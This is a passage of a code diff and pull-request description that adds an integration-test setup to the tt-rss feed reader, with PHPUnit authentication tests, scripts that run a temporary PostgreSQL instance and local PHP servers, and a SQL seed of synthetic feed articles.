+        $this->testUid = (int) $pdo->query(
+            "SELECT currval(pg_get_serial_sequence('ttrss_users', 'id'))"
+        )->fetchColumn();
+    }
+
+    protected function tearDown(): void {
+        parent::tearDown();
+
+        $pdo = Db::pdo();
+
+        $pdo->exec("DELETE FROM ttrss_users WHERE login = 'testuser'");
+        $pdo->exec("DELETE FROM ttrss_users WHERE login = 'disabled'");
+    }
+
+    // ── Happy paths ──────────────────────────────────────────────────────────
+
+    public function test_correct_credentials_returns_true_and_sets_session(): void {
+        $result = UserHelper::authenticate('testuser', 'testpass123');
+
+        $this->assertTrue($result);
+        $this->assertEquals($this->testUid, $_SESSION['uid']);
+        $this->assertEquals('testuser', $_SESSION['name']);
+        $this->assertEquals(UserHelper::ACCESS_LEVEL_USER, $_SESSION['access_level']);
+        $this->assertEquals('auth_internal', $_SESSION['auth_module']);
+    }
+
+    public function test_admin_credentials_work(): void {
+        $result = UserHelper::authenticate('admin', 'password');
+
+        $this->assertTrue($result);
+        $this->assertEquals(1, $_SESSION['uid']);
+        $this->assertEquals(UserHelper::ACCESS_LEVEL_ADMIN, $_SESSION['access_level']);
+    }
+
+    public function test_authenticate_regenerates_session_id(): void {
+        $before = session_id();
+        UserHelper::authenticate('testuser', 'testpass123');
+
+        $this->assertNotEquals($before, session_id());
+    }
+
+    public function test_authenticate_updates_last_login(): void {
+        usleep(100_000);
+        UserHelper::authenticate('testuser', 'testpass123');
+
+        $lastLogin = Db::pdo()->query(
+            "SELECT last_login FROM ttrss_users WHERE login = 'testuser'"
+        )->fetchColumn();
+
+        $this->assertNotNull($lastLogin);
+    }
+
+    // ── Failures ─────────────────────────────────────────────────────────────
+
+    public function test_wrong_password_returns_false(): void {
+        $this->assertFalse(UserHelper::authenticate('testuser', 'wrong'));
+    }
+
+    public function test_nonexistent_user_returns_false(): void {
+        $this->assertFalse(UserHelper::authenticate('ghost', 'anything'));
+    }
+
+    public function test_login_is_case_insensitive(): void {
+        $this->assertTrue(UserHelper::authenticate('TESTUSER', 'testpass123'));
+    }
+
+    // ── Disabled user ────────────────────────────────────────────────────────
+
+    public function test_disabled_user_cannot_authenticate(): void {
+        $hash = UserHelper::hash_password('nope', 'saltxx', UserHelper::HASH_ALGO_SSHA512);
+        Db::pdo()->exec("
+            INSERT INTO ttrss_users (login, pwd_hash, salt, access_level)
+            VALUES ('disabled', '{$hash}', 'saltxx', -2)
+        ");
+
+        $this->assertFalse(UserHelper::authenticate('disabled', 'nope'));
+    }
+
+}

--- a/tests_integration/bootstrap.php
+++ b/tests_integration/bootstrap.php
@@ -1,0 +1,14 @@
+<?php
+    set_include_path(dirname(__DIR__) ."/include" . PATH_SEPARATOR .
+    get_include_path());
+
+    session_save_path("/tmp");
+
+    require_once "autoload.php";
+
+    require_once __DIR__ . "/IntegrationTestCase.php";
+    require_once __DIR__ . "/DbTestCase.php";
+    require_once __DIR__ . "/HandlerTestCase.php";
+
+    // Force Config singleton to re-read the environment variables
+    Config::get_instance()->reload();

--- a/tests_integration/feed.xml
+++ b/tests_integration/feed.xml
@@ -1,0 +1,14 @@
+<?xml version="1.0" encoding="utf-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://mfw.fakecake.org/testfeeds/" >
+  <title type="text">Atom:base testfeed</title>
+  <id>tag:fakecake.org,2021:minerva-feed</id>
+  <updated>2021-05-21T14:17:43+04:00</updated>
+  <entry>
+    <title>x-21may2020</title>
+    <link rel="alternate" type="text/html" href="clouds.png" />
+    <id>tag:fakecake.org,2021:minerva-2021-05-20</id>
+    <updated>2021-05-21T07:54:43+04:00</updated>
+    <published>2021-05-21T07:54:43+04:00</published>
+     <content type="html">...</content>
+    </entry>
+</feed>

--- a/tests_integration/pg_helper.sh
+++ b/tests_integration/pg_helper.sh
@@ -1,0 +1,182 @@
+#!/usr/bin/env bash
+#
+# PostgreSQL lifecycle helper for integration tests.
+# Manages a temporary PG instance: init, start, stop, db creation.
+#
+# Usage:
+#   pg_helper.sh init        — initialize data directory
+#   pg_helper.sh start       — start the server
+#   pg_helper.sh stop        — stop the server
+#   pg_helper.sh create-db   — create the test database
+#   pg_helper.sh drop-db     — drop the test database
+#   pg_helper.sh status      — print status
+#
+# Environment variables (with defaults):
+#   __TTRSS_PG_PORT        — port for the test PG instance (default: 55432)
+#   __TTRSS_PG_DATA_DIR    — temp data directory (default: auto-created in /tmp)
+#   __TTRSS_PG_USER        — database user (default: ttrss_test)
+#   __TTRSS_PG_PASS        — database password (default: ttrss_test)
+#   __TTRSS_PG_DB          — database name (default: ttrss_test)
+#   __TTRSS_PG_BIN_DIR     — PostgreSQL bin directory (default: detected)
+#
+
+set -euo pipefail
+
+# ── Helpers ──────────────────────────────────────────────────────────────────
+
+log() {
+    echo "[$(date '+%H:%M:%S')] [pg_helper] $*"
+}
+
+die() {
+    echo "ERROR: $*" >&2
+    exit 1
+}
+
+wait_for_pg() {
+    local max_wait="${1:-30}"
+    local waited=0
+
+    while ! "$PG_BIN_DIR"/pg_isready -h localhost -p "$PG_PORT" -q 2>/dev/null; do
+        if (( waited >= max_wait )); then
+            die "PostgreSQL did not start within ${max_wait}s"
+        fi
+        sleep 0.5
+        (( waited++ ))
+    done
+}
+
+# ── Configuration ────────────────────────────────────────────────────────────
+
+PG_PORT="${__TTRSS_PG_PORT:-55432}"
+PG_USER="${__TTRSS_PG_USER:-ttrss_test}"
+PG_PASS="${__TTRSS_PG_PASS:-ttrss_test}"
+PG_DB="${__TTRSS_PG_DB:-ttrss_test}"
+
+# Superuser for admin operations (created by initdb, matches OS user)
+PG_SUPERUSER="${__TTRSS_PG_SUPERUSER:-$(whoami)}"
+
+# Auto-detect PG bin directory
+if [[ -n "${__TTRSS_PG_BIN_DIR:-}" ]]; then
+    PG_BIN_DIR="$__TTRSS_PG_BIN_DIR"
+else
+    # Try common locations for PostgreSQL
+    for candidate in \
+        "/usr/bin" \
+        "/usr/lib/postgresql/16/bin" \
+        "/usr/local/pgsql/bin" \
+    ; do
+        if [[ -x "$candidate/pg_ctl" ]]; then
+            PG_BIN_DIR="$candidate"
+            break
+        fi
+    done
+    [[ -z "${PG_BIN_DIR:-}" ]] && die "Cannot find pg_ctl. Set __TTRSS_PG_BIN_DIR."
+fi
+
+# Create a unique temp data directory (use PID to avoid collisions)
+if [[ -n "${__TTRSS_PG_DATA_DIR:-}" ]]; then
+    PG_DATA_DIR="$__TTRSS_PG_DATA_DIR"
+else
+    # Use a deterministic name based on port so init/start/use all share the same dir
+    PG_DATA_DIR="/tmp/ttrss-pg-${PG_PORT}"
+fi
+
+PG_LOG_FILE="$PG_DATA_DIR/pg.log"
+PG_PID_FILE="$PG_DATA_DIR/postmaster.pid"
+
+# ── Commands ─────────────────────────────────────────────────────────────────
+
+cmd_init() {
+    if [[ -f "$PG_DATA_DIR/PG_VERSION" ]]; then
+        log "Data directory already initialized: $PG_DATA_DIR"
+        return 0
+    fi
+    log "Initializing PostgreSQL data directory: $PG_DATA_DIR"
+    "$PG_BIN_DIR"/initdb --auth=trust --auth-host=md5 --encoding=UTF8 -D "$PG_DATA_DIR" 2>&1 | tail -3
+    log "Data directory initialized."
+}
+
+cmd_start() {
+    if [[ -f "$PG_PID_FILE" ]] && "$PG_BIN_DIR"/pg_isready -h localhost -p "$PG_PORT" -q 2>/dev/null; then
+        log "PostgreSQL already running on port $PG_PORT."
+        return 0
+    fi
+
+    log "Starting PostgreSQL on port $PG_PORT ..."
+    "$PG_BIN_DIR"/pg_ctl start \
+        -D "$PG_DATA_DIR" \
+        -l "$PG_LOG_FILE" \
+        -o "-c port=$PG_PORT -c unix_socket_directories=." \
+        -w
+
+    # Trust all local connections (TCP and socket) for testing
+    cat > "$PG_DATA_DIR/pg_hba.conf" <<'HBA'
+# TYPE  DATABASE        USER            ADDRESS                 METHOD
+local   all             all                                     trust
+host    all             all             127.0.0.1/32            trust
+host    all             all             ::1/128                 trust
+HBA
+
+    # Reload to pick up new pg_hba.conf
+    "$PG_BIN_DIR"/pg_ctl reload -D "$PG_DATA_DIR" -w
+
+    wait_for_pg 30
+    log "PostgreSQL started on port $PG_PORT."
+}
+
+cmd_stop() {
+    if [[ ! -f "$PG_PID_FILE" ]]; then
+        log "PostgreSQL not running."
+        return 0
+    fi
+
+    log "Stopping PostgreSQL ..."
+    "$PG_BIN_DIR"/pg_ctl stop -D "$PG_DATA_DIR" -w 2>/dev/null || true
+    rm -f "$PG_PID_FILE"
+    log "PostgreSQL stopped."
+}
+
+cmd_create_user() {
+    log "Creating user '$PG_USER' ..."
+    "$PG_BIN_DIR"/createuser -h localhost -p "$PG_PORT" -U "$PG_SUPERUSER" --superuser "$PG_USER" 2>/dev/null || true
+    log "User ready."
+}
+
+cmd_create_db() {
+    log "Creating database '$PG_DB' ..."
+    # Create user first if it doesn't exist
+    "$PG_BIN_DIR"/createuser -h localhost -p "$PG_PORT" -U "$PG_SUPERUSER" --superuser "$PG_USER" 2>/dev/null || true
+    "$PG_BIN_DIR"/createdb -h localhost -p "$PG_PORT" -U "$PG_SUPERUSER" "$PG_DB" 2>/dev/null || true
+    log "Database ready."
+}
+
+cmd_drop_db() {
+    log "Dropping database '$PG_DB' ..."
+    "$PG_BIN_DIR"/dropdb -h localhost -p "$PG_PORT" -U "$PG_USER" "$PG_DB" --if-exists 2>/dev/null || true
+}
+
+cmd_status() {
+    if [[ -f "$PG_PID_FILE" ]]; then
+        echo "running (pid: $(cat "$PG_PID_FILE" | head -1))"
+    else
+        echo "stopped"
+    fi
+}
+
+# ── Main ─────────────────────────────────────────────────────────────────────
+
+case "${1:-help}" in
+    init)       cmd_init ;;
+    start)      cmd_start ;;
+    stop)       cmd_stop ;;
+    create-user) cmd_create_user ;;
+    create-db)  cmd_create_db ;;
+    drop-db)    cmd_drop_db ;;
+    status)     cmd_status ;;
+    cleanup)    cmd_stop; rm -rf "$PG_DATA_DIR"; log "Cleaned up $PG_DATA_DIR" ;;
+    *)
+        echo "Usage: $0 {init|start|stop|create-user|create-db|drop-db|status|cleanup}"
+        exit 1
+        ;;
+esac

--- a/tests_integration/run.sh
+++ b/tests_integration/run.sh
@@ -1,0 +1,224 @@
+#!/usr/bin/env bash
+#
+# Integration test runner for tt-rss.
+#
+# Orchestrates the full lifecycle:
+#   1. Start temporary PostgreSQL instance
+#   2. Create database and run schema migrations
+#   3. Start PHP development server
+#   4. Run PHPUnit integration tests
+#   5. Clean up everything
+#
+# Usage:
+#   ./tests_integration/run.sh [--cleanup-only] [--keep-db] [phpunit args...]
+#
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+PROJECT_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+
+# ── Helpers ──────────────────────────────────────────────────────────────────
+
+log() {
+    echo "[$(date '+%H:%M:%S')] [run] $*"
+}
+
+# ── Configuration ────────────────────────────────────────────────────────────
+
+export PG_PORT=55432
+export PHP_PORT1=9080
+export PHP_PORT2=9081
+
+export PG_USER="ttrss_test"
+export PG_PASS="ttrss_test"
+export PG_DB="ttrss_test"
+
+if [[ -n "${__TTRSS_PG_DATA_DIR:-}" ]]; then
+    export PG_DATA_DIR="$__TTRSS_PG_DATA_DIR"
+fi
+
+PHP_BIN=""
+
+if [[ -n "${__TTRSS_PHP_BIN:-}" ]]; then
+    PHP_BIN="${__TTRSS_PHP_BIN}"
+else
+    # Try common locations for php
+    for candidate in \
+        "php84" \
+        "php8.4" \
+        "php" \
+    ; do
+        if command -v $candidate >/dev/null; then
+            PHP_BIN=$(command -v $candidate)
+            break
+        fi
+    done
+fi
+
+CLEANUP_ONLY=false
+KEEP_DB=false
+PHPUNIT_ARGS=()
+
+# Parse arguments
+while [[ $# -gt 0 ]]; do
+    case "$1" in
+        --cleanup-only) CLEANUP_ONLY=true; shift ;;
+        --keep-db)      KEEP_DB=true; shift ;;
+        -*)             PHPUNIT_ARGS+=("$1"); shift ;;
+        *)              PHPUNIT_ARGS+=("$1"); shift ;;
+    esac
+done
+
+# ── Functions ────────────────────────────────────────────────────────────────
+
+cleanup() {
+    local RC=$?
+
+    log "Cleaning up ..."
+
+    # Stop PHP server
+    if [[ -n "${PHP_SERVER1_PID:-}" ]] && kill -0 "$PHP_SERVER1_PID" 2>/dev/null; then
+        log "Stopping PHP server 1 (pid $PHP_SERVER1_PID) ..."
+        kill "$PHP_SERVER1_PID" 2>/dev/null || true
+        wait "$PHP_SERVER1_PID" 2>/dev/null || true
+    fi
+
+    if [[ -n "${PHP_SERVER2_PID:-}" ]] && kill -0 "$PHP_SERVER2_PID" 2>/dev/null; then
+        log "Stopping PHP server 2 (pid $PHP_SERVER2_PID) ..."
+        kill "$PHP_SERVER2_PID" 2>/dev/null || true
+        wait "$PHP_SERVER2_PID" 2>/dev/null || true
+    fi
+
+    # Stop PostgreSQL
+    if [[ -n "${PG_HELPER:-}" ]]; then
+        "$PG_HELPER" stop 2>/dev/null || true
+        if [[ "$KEEP_DB" != "true" ]]; then
+            "$PG_HELPER" cleanup 2>/dev/null || true
+        fi
+    fi
+
+    # if [ $RC != 0 ]; then
+    #   cat "$PROJECT_ROOT/tests_integration/php_server1.log"
+    #   cat "$PROJECT_ROOT/tests_integration/php_server2.log"
+    # fi
+
+    rm -f -- "$PROJECT_ROOT/tests_integration/php_server1.log"
+    rm -f -- "$PROJECT_ROOT/tests_integration/php_server2.log"
+}
+
+# ── Main ─────────────────────────────────────────────────────────────────────
+
+# Register cleanup trap
+trap cleanup EXIT INT TERM
+
+# Cleanup-only mode
+if [[ "$CLEANUP_ONLY" == "true" ]]; then
+    log "Cleanup-only mode."
+    exit 0
+fi
+
+# Ensure we're in the project root
+cd "$PROJECT_ROOT"
+
+# Make sure pg_helper is executable
+PG_HELPER="$SCRIPT_DIR/pg_helper.sh"
+
+log "═══════════════════════════════════════════════════════"
+log "  tt-rss Integration Test Runner"
+log "═══════════════════════════════════════════════════════"
+log "PHP: $PHP_BIN"
+log "PG Port: $PG_PORT"
+log "PHP Server Port: $PHP_PORT1 / $PHP_PORT2"
+log "PG Data Dir: ${PG_DATA_DIR:-<auto>}"
+log "───────────────────────────────────────────────────────"
+
+# Step 1: Initialize PostgreSQL
+log "Step 1/5: Initializing PostgreSQL ..."
+"$PG_HELPER" init
+"$PG_HELPER" start
+
+# Step 2: Create database user and database
+log "Step 2/5: Creating database user and database ..."
+"$PG_HELPER" create-user
+"$PG_HELPER" create-db
+
+# Step 3: Run schema migrations
+log "Step 3/5: Running schema migrations ..."
+
+export TTRSS_DB_HOST=localhost
+export TTRSS_DB_PORT=${PG_PORT}
+export TTRSS_DB_NAME="${PG_DB}"
+export TTRSS_DB_USER="${PG_USER}"
+export TTRSS_DB_PASS="${PG_PASS}"
+export TTRSS_DB_SSLMODE=disable
+export TTRSS_SINGLE_USER_MODE=1
+export OTEL_PHP_AUTOLOAD_ENABLED=false
+export OTEL_TRACES_EXPORTER=none
+export OTEL_METRICS_EXPORTER=none
+export OTEL_LOGS_EXPORTER=none
+export OTEL_PHP_DISABLED_INSTRUMENTATIONS=pdo,guzzle,psr18,slim,io
+# we have to set it here so it's also available to code running in PHP development server
+export IS_INTEGRATION_TESTING=true
+export XDEBUG_MODE=coverage
+
+$PHP_BIN ./update.php --update-schema=force-yes
+$PHP_BIN ./update.php --user-enable-api admin:true
+
+# Step 3b: Seed synthetic test data
+# log "Step 3b/5: Seeding test data ..."
+# psql -h localhost -p "$PG_PORT" -U "$PG_USER" -d "$PG_DB" -f "$SCRIPT_DIR/seed.sql"
+
+# Step 4: Start PHP development server
+log "Step 4/5: Starting PHP development servers, ports: $PHP_PORT1 / $PHP_PORT2..."
+
+# Start PHP server in background, redirect its output
+nohup "$PHP_BIN" -S "0.0.0.0:$PHP_PORT1" -t "$PROJECT_ROOT" \
+    > "$PROJECT_ROOT/tests_integration/php_server1.log" 2>&1 &
+PHP_SERVER1_PID=$!
+
+# Since it is single-threaded we need to run another one for mock outgoing requests
+nohup "$PHP_BIN" -S "0.0.0.0:$PHP_PORT2" -t "$PROJECT_ROOT" \
+    > "$PROJECT_ROOT/tests_integration/php_server2.log" 2>&1 &
+PHP_SERVER2_PID=$!
+
+# Wait for PHP server to be ready
+log "Waiting for PHP server 1 to start ..."
+for i in $(seq 1 30); do
+    if curl -fs "http://localhost:$PHP_PORT1/api/" >/dev/null 2>&1; then
+        log "PHP server is ready."
+        break
+    fi
+    if (( i == 30 )); then
+        log "PHP server did not start in time. Logs:"
+        cat "$PROJECT_ROOT/tests_integration/php_server1.log" >&2
+        exit 1
+    fi
+    sleep 0.5
+done
+
+log "Waiting for PHP server 2 to start ..."
+for i in $(seq 1 30); do
+    if curl -fs "http://localhost:$PHP_PORT2/api/" >/dev/null 2>&1; then
+        log "PHP server is ready."
+        break
+    fi
+    if (( i == 30 )); then
+        log "PHP server did not start in time. Logs:"
+        cat "$PROJECT_ROOT/tests_integration/php_server2.log" >&2
+        exit 1
+    fi
+    sleep 0.5
+done
+
+# Step 5: Run PHPUnit
+log "Step 5/5: Running PHPUnit integration tests ..."
+
+# Export env vars for tests
+export API_URL="http://localhost:$PHP_PORT1/api/index.php"
+export APP_URL="http://localhost:$PHP_PORT2"
+
+# Run PHPUnit with the integration testsuite
+"$PHP_BIN" -d zend_extension=xdebug vendor/bin/phpunit \
+    --configuration "$PROJECT_ROOT/phpunit.integration.xml" \
+    "${PHPUNIT_ARGS[@]+"${PHPUNIT_ARGS[@]}"}"

--- a/tests_integration/seed.sql
+++ b/tests_integration/seed.sql
@@ -1,0 +1,170 @@
+--
+-- Synthetic test data seed for integration tests.
+-- Based on tt-rss-dev.sql dump structure.
+-- Run after schema migration, before tests.
+--
+-- NOTE: This file must be executed within a single transaction (wrapped by PHP).
+-- Deleting in FK dependency order (children first) avoids constraint violations.
+-- The entire operation is wrapped in a transaction to minimize lock duration
+-- and avoid deadlocks when the PHP dev server concurrently accesses the DB.
+-- The readiness check in IntegrationTestCase::waitForApiReady() ensures the
+-- PHP dev server is ready before seeding begins.
+--
+
+-- Clear all tables in FK dependency order.
+-- Must be executed within a single transaction (wrapped by PHP seedDatabase()).
+-- Delete order follows FK references: child tables first, then parent tables.
+--
+-- FK order (child -> parent):
+--   ttrss_tags -> ttrss_user_entries -> ttrss_entries
+--   ttrss_user_labels2 -> ttrss_entries, ttrss_labels2
+--   ttrss_enclosures -> ttrss_entries
+--   ttrss_user_entries -> ttrss_entries, ttrss_feeds
+--   ttrss_feeds -> ttrss_feed_categories
+
+DELETE FROM ttrss_tags;
+DELETE FROM ttrss_user_labels2;
+DELETE FROM ttrss_enclosures;
+DELETE FROM ttrss_user_entries;
+DELETE FROM ttrss_feeds;
+DELETE FROM ttrss_feed_categories;
+DELETE FROM ttrss_labels2;
+DELETE FROM ttrss_entries;
+
+-- 2. Feed categories
+INSERT INTO ttrss_feed_categories (id, owner_uid, title) VALUES
+(1, 1, 'Technology'),
+(2, 1, 'Science & Nature');
+
+SELECT setval(pg_get_serial_sequence('ttrss_feed_categories', 'id'), (SELECT MAX(id) FROM ttrss_feed_categories));
+
+-- 2b. Labels
+INSERT INTO ttrss_labels2 (id, owner_uid, caption) VALUES
+(1, 1, 'test-label-1'),
+(2, 1, 'test-label-2');
+
+SELECT setval(pg_get_serial_sequence('ttrss_labels2', 'id'), (SELECT MAX(id) FROM ttrss_labels2));
+
+-- 3. Feeds
+-- Columns: id, owner_uid, title, cat_id, feed_url, update_interval, purge_interval, site_url
+INSERT INTO ttrss_feeds (id, owner_uid, title, cat_id, feed_url, update_interval, purge_interval, site_url) VALUES
+(1, 1, 'Hacker News', 1, 'https://hnrss.org/frontpage', 30, 0, 'https://news.ycombinator.com'),
+(2, 1, 'The Register', 1, 'https://www.theregister.com/headlines.atom', 60, 0, 'https://www.theregister.com'),
+(3, 1, 'Ars Technica', 1, 'https://feeds.arstechnica.com/arstechnica/index', 60, 0, 'https://arstechnica.com'),
+(4, 1, 'MIT Tech Review', 2, 'https://www.technologyreview.com/feed/', 120, 0, 'https://www.technologyreview.com');
+
+SELECT setval(pg_get_serial_sequence('ttrss_feeds', 'id'), (SELECT MAX(id) FROM ttrss_feeds));
+
+-- 4. Articles (ttrss_entries)
+INSERT INTO ttrss_entries (id, title, guid, link, updated, content, content_hash, date_entered, date_updated) VALUES
+-- Hacker News articles
+(1, 'Show HN: I built a distributed task queue in Rust',
+ 'tag:hnrss.org,2026:hn-001', 'https://news.ycombinator.com/item?id=40001',
+ '2026-05-25 10:00:00',
+ '<p>Today I am excited to share my open-source distributed task queue written in Rust. It supports at-least-once delivery, automatic retries, and priority queues.</p>',
+ 'SHA1:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2',
+ '2026-05-25 10:00:00', '2026-05-25 10:00:00'),
+
+(2, 'PostgreSQL 18 released with major performance improvements',
+ 'tag:hnrss.org,2026:hn-002', 'https://news.ycombinator.com/item?id=40002',
+ '2026-05-25 09:30:00',
+ '<p>PostgreSQL 18 brings significant performance improvements including parallel query optimizations, better memory management, and enhanced JSONB support.</p>',
+ 'SHA1:b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3',
+ '2026-05-25 09:30:00', '2026-05-25 09:30:00'),
+
+(3, 'The rise of WebAssembly in server-side applications',
+ 'tag:hnrss.org,2026:hn-003', 'https://news.ycombinator.com/item?id=40003',
+ '2026-05-24 18:00:00',
+ '<p>WebAssembly is no longer just for the browser. Companies are increasingly using WASM for server-side plugins, microservices, and edge computing.</p>',
+ 'SHA1:c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4',
+ '2026-05-24 18:00:00', '2026-05-24 18:00:00'),
+
+-- The Register articles
+(4, 'AI startup raises $500M to build autonomous software engineers',
+ 'tag:theregister.com,2026:reg-001', 'https://www.theregister.com/2026/05/25/ai_startup_autonomous/',
+ '2026-05-25 08:00:00',
+ '<p>A new AI startup has secured half a billion dollars in funding to develop autonomous software engineering agents that can write, test, and deploy code without human intervention.</p>',
+ 'SHA1:d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5',
+ '2026-05-25 08:00:00', '2026-05-25 08:00:00'),
+
+(5, 'Major cloud provider suffers 6-hour outage across all regions',
+ 'tag:theregister.com,2026:reg-002', 'https://www.theregister.com/2026/05/24/cloud_outage/',
+ '2026-05-24 14:00:00',
+ '<p>A leading cloud provider experienced a complete outage lasting six hours, affecting thousands of customer services worldwide. The cause appears to be a cascading failure in the networking layer.</p>',
+ 'SHA1:e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6',
+ '2026-05-24 14:00:00', '2026-05-24 14:00:00'),
+
+(6, 'European Union proposes strict AI transparency rules for enterprises',
+ 'tag:theregister.com,2026:reg-003', 'https://www.theregister.com/2026/05/24/eu_ai_transparency/',
+ '2026-05-24 11:00:00',
+ '<p>The European Commission has unveiled new regulations requiring enterprises to disclose when AI systems are used in decision-making processes affecting employees and customers.</p>',
+ 'SHA1:f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1',
+ '2026-05-24 11:00:00', '2026-05-24 11:00:00'),
+
+-- Ars Technica articles
+(7, 'Apple announces new M5 chip with 40% faster neural engine',
+ 'tag:arstechnica.com,2026:ars-001', 'https://arstechnica.com/gadgets/2026/05/apple-m5-chip/',
+ '2026-05-25 07:00:00',
+ '<p>Apple has unveiled its next-generation M5 chip, featuring a dramatically improved neural engine designed for on-device AI workloads. Early benchmarks show significant gains over the M4.</p>',
+ 'SHA1:a1a2a3a4a5a6a7a8a9a0b1b2b3b4b5b6b7b8b9b0',
+ '2026-05-25 07:00:00', '2026-05-25 07:00:00'),
+
+(8, 'How Kubernetes evolved from a research project to cloud infrastructure backbone',
+ 'tag:arstechnica.com,2026:ars-002', 'https://arstechnica.com/information-technology/2026/05/kubernetes-history/',
+ '2026-05-24 16:00:00',
+ '<p>A deep dive into the 15-year history of Kubernetes, from its origins at Google to becoming the de facto standard for container orchestration worldwide.</p>',
+ 'SHA1:b1b2b3b4b5b6b7b8b9b0c1c2c3c4c5c6c7c8c9c0',
+ '2026-05-24 16:00:00', '2026-05-24 16:00:00'),
+
+-- MIT Tech Review articles
+(9, 'New battery technology could double electric vehicle range',
+ 'tag:technologyreview.com,2026:mit-001', 'https://www.technologyreview.com/2026/05/25/battery-tech/',
+ '2026-05-25 06:00:00',
+ '<p>Researchers at MIT have developed a solid-state battery prototype that could double the range of electric vehicles while reducing charging time to under 15 minutes.</p>',
+ 'SHA1:c1c2c3c4c5c6c7c8c9c0d1d2d3d4d5d6d7d8d9d0',
+ '2026-05-25 06:00:00', '2026-05-25 06:00:00'),
+
+(10, 'CRISPR gene therapy shows promise in treating rare genetic diseases',
+ 'tag:technologyreview.com,2026:mit-002', 'https://www.technologyreview.com/2026/05/24/crispr-therapy/',
+ '2026-05-24 12:00:00',
+ '<p>Clinical trials of a new CRISPR-based gene therapy have shown remarkable results in treating sickle cell disease and beta-thalassemia, with 95% of patients showing significant improvement.</p>',
+ 'SHA1:d1d2d3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3',
+ '2026-05-24 12:00:00', '2026-05-24 12:00:00'),
+
+(11, 'The quantum computing race: IBM and Google push qubit records',
+ 'tag:technologyreview.com,2026:mit-003', 'https://www.technologyreview.com/2026/05/23/quantum-race/',
+ '2026-05-23 15:00:00',
+ '<p>Both IBM and Google have announced breakthroughs in quantum computing, with each claiming to have achieved quantum advantage in specific optimization problems.</p>',
+ 'SHA1:e1e2e3e4e5e6e7e8e9e0f1f2f3f4f5f6f7f8f9f0',
+ '2026-05-23 15:00:00', '2026-05-23 15:00:00');
+
+SELECT setval(pg_get_serial_sequence('ttrss_entries', 'id'), (SELECT MAX(id) FROM ttrss_entries));
+
+-- 5. User entries (ttrss_user_entries) — mix of read/unread
+-- Columns: ref_id, uuid, feed_id, owner_uid, unread, marked, tag_cache, label_cache
+INSERT INTO ttrss_user_entries (ref_id, uuid, feed_id, owner_uid, unread, marked, tag_cache, label_cache) VALUES
+-- HN: 2 unread, 1 read
+(1, 'uuid-hn-001', 1, 1, true, false, 'rust|open-source', ''),
+(2, 'uuid-hn-002', 1, 1, true, false, 'database|postgresql', ''),
+(3, 'uuid-hn-003', 1, 1, false, true, 'webassembly|cloud', ''),
+
+-- The Register: 3 unread
+(4, 'uuid-reg-001', 2, 1, true, false, 'ai|startup', ''),
+(5, 'uuid-reg-002', 2, 1, true, false, 'cloud|outage', ''),
+(6, 'uuid-reg-003', 2, 1, true, false, 'eu|regulation|ai', ''),
+
+-- Ars Technica: 1 unread, 1 read
+(7, 'uuid-ars-001', 3, 1, true, false, 'apple|hardware', ''),
+(8, 'uuid-ars-002', 3, 1, false, true, 'kubernetes|history', ''),
+
+-- MIT Tech Review: 2 unread, 1 read
+(9, 'uuid-mit-001', 4, 1, true, false, 'battery|ev', ''),
+(10, 'uuid-mit-002', 4, 1, true, false, 'crispr|healthcare', ''),
+(11, 'uuid-mit-003', 4, 1, false, true, 'quantum|computing', '');
+
+-- 5b. Enclosures for article id=1 (YouTube + image enclosure)
+INSERT INTO ttrss_enclosures (content_url, content_type, title, duration, width, height, post_id) VALUES
+('https://example.com/video.mp4', 'video/mp4', 'Demo Video', '05:30', 1920, 1080, 1),
+('https://img.youtube.com/vi/dQw4w9WgXcQ/hqdefault.jpg', 'image/jpeg', 'Thumbnail', 0, 480, 360, 1);
+
+SELECT setval(pg_get_serial_sequence('ttrss_enclosures', 'id'), (SELECT MAX(id) FROM ttrss_enclosures));


### PR DESCRIPTION
I'm not sure if you guys would be interested but I've been screwing around and thought why not share.

This adds a new simplified platform to run integration tests which could be automated in a CI/CD pipeline much easier than before (basically, needs a php+postgresql image), i've also imported a subset of (mostly generated) tests from my current codebase which still apply to this one, and took the liberty of fixing a few minor bugs while I was at it.

I kept currently existing tests/ implementation as is, so this is purely an addition.

A small amount of (in my opinion) valid tests are failing which might warrant looking into (or not), I kept them as-is.

I've also backported preference profile management (mostly because it was covered by tests, dropping all of it felt like a waste) in case you'd also want to decouple that logic out of Pref_Prefs UI controller.

Functional test results:

```
$ npm run phpunit

> tt-rss@1.0.0 phpunit
> XDEBUG_MODE=coverage ./vendor/bin/phpunit

PHPUnit 9.5.16 by Sebastian Bergmann and contributors.

Runtime:       PHP 8.4.21
Configuration: /home/fox/Projects/tt-rss-github/phpunit.xml

..............................................F................  63 / 427 ( 14%)
............................................................... 126 / 427 ( 29%)
............................................................... 189 / 427 ( 44%)
............................................................... 252 / 427 ( 59%)
............................................................... 315 / 427 ( 73%)
E................................................PHP Warning:  file_get_contents(templates/nonexistent.tpl): Failed to open stream: No such file or directory in /home/fox/Projects/tt-rss-github/lib/MiniTemplator.class.php on line 840
.............. 378 / 427 ( 88%)
..............................F..................               427 / 427 (100%)

Time: 00:00.198, Memory: 12.00 MB

...

Tests: 427, Assertions: 734, Errors: 1, Failures: 2.
```

Integration test results:

```
$ ./tests_integration/run.sh

...

[14:05:33] [run] Step 5/5: Running PHPUnit integration tests ...
Cannot load Xdebug - it was already loaded
PHPUnit 9.5.16 by Sebastian Bergmann and contributors.

Runtime:       PHP 8.4.21
Configuration: /home/fox/Projects/tt-rss-github/phpunit.integration.xml

...............................................................  63 / 554 ( 11%)
.........E........E............FFF......F.F.................... 126 / 554 ( 22%)
............................................................... 189 / 554 ( 34%)
................E.............................................. 252 / 554 ( 45%)
............................................................... 315 / 554 ( 56%)
.......................................................F....... 378 / 554 ( 68%)
............................................................... 441 / 554 ( 79%)
......F........................................................ 504 / 554 ( 90%)
..................................................              554 / 554 (100%)

Time: 00:04.956, Memory: 17.00 MB

...

Tests: 554, Assertions: 1726, Errors: 3, Failures: 7.
```
